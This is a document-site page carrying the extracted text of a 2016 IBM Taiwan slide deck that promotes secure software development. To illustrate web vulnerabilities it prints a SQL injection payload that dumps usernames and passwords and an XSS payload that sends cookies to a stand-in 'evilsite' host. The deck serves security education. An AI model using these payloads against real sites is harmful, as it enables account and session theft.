《IBM Innovate 2016-B_3 Innovate TW 2016_提升防骇实力 V1.0》.pdf

《IBM Innovate 2016-B_3 Innovate TW 2016_提升防骇实力 V1.0》.pdf

  1. 1、本文档共36页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
《IBM Innovate 2016-B_3 Innovate TW 2016_提升防骇实力 V1.0》.pdf

提升防駭實力 軟體開發更要有內力 陳家豪 (Max Chen) 台灣 IBM公司軟體事業處 Rational技術顧問 歡迎來到智慧的地球 (Smarter Planet) Our world is getting Instrumented Our world is getting Interconnected Our world is getting Intelligent 3 迎接智慧的地球我們將面對的挑戰 Key drivers for security projects 與日俱增的 不斷增加的 要確保符合 複雜度 支出 法規要求 很快地 ,世界會有超過 美國企業對於企業風 據統計, 美國企業為 一兆個裝置連接,構成 險與遵規管理的支出 每筆被駭客竊取的客 所謂的物聯網 已達到 三百億美金,台 戶資料 ,要付出 214美 (internet of things) 灣企業也不斷地增加 金的代價 ,台灣呢 ? 相關預算 Source /news/article/0,289142,sid195_gci1375707,00.html Web應用程式的漏洞是最重要的風險來源 根據X-Force的統計 ,在所有類型的漏洞中, 49%是 Web應用程式的漏洞 即便很多人對其已不算陌生 , Cross-Site Scripting和 SQL injection仍 然長年位居Web 應用程式漏洞的 Top 2 IBM XFORCE Year-End 2010 Trend Report 範例 : SQL Injection 盜取帳戶資料 範例 : SQL Injection 盜取帳戶資料 改輸入 01/01/2006 union select userid,null,username+,+password,null from users-- 範例 : SQL Injection 盜取帳戶資料 交易明細查詢 竟變成 帳號密碼查詢 範例 : Cross-site Scripting (XSS) 範例 : Cross-site Scripting (XSS) 哦 ?變粗體了 這個查詢欄位可以 用來執行程式耶 範例 : Cross-site Scripting (XSS) 在查詢欄位輸入 scriptdocument.write(img src=http://evilsite/+document.cookie);/script 使用者的session資料無聲無息被送往駭客的電腦 嘿嘿 …接下來只要想辦法騙別人連這個網址就好了 更多應該關注應用程式安全性的理由 •因駭客攻擊導致資料外洩的案例中 , 89%和 SQL Injection有關 • 應遵循 PCI 安全標準的受害組織中,有 79%被發現沒有遵規 (non-compliant) • 被駭客竊取的資料中 ,有 92

文档评论(0)

wfkm + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档